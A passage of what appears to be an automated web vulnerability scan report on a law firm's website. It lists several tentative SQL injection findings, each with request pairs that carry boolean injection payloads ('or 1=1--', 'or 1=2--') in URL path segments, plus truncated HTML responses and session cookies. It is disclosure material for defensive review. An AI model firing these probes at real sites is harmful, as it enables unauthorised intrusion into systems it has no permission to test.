<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr315403378'%20or%201%3d2--%20/adobegaramond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.52. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/adobegaramond.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11428496'%20or%201%3d1--%20 and 11428496'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr3/adobegaramond.swf11428496'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr3/adobegaramond.swf11428496'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.53. http://www.curtis.com/sifr3/garamond.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/garamond.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 38575443'%20or%201%3d1--%20 and 38575443'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr338575443'%20or%201%3d1--%20/garamond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:16:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
...[SNIP]...

Request 2

GET /sifr338575443'%20or%201%3d2--%20/garamond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:16:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
-->
...[SNIP]...

1.54. http://www.curtis.com/sifr3/garamond.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/garamond.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 18657485'%20or%201%3d1--%20 and 18657485'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr3/garamond.swf18657485'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:16:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
...[SNIP]...

Request 2

GET /sifr3/garamond.swf18657485'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:16:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
-->
...[SNIP]...

1.55. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/gillsans.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13597788'%20or%201%3d1--%20 and 13597788'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr313597788'%20or%201%3d1--%20/gillsans.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr313597788'%20or%201%3d2--%20/gillsans.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
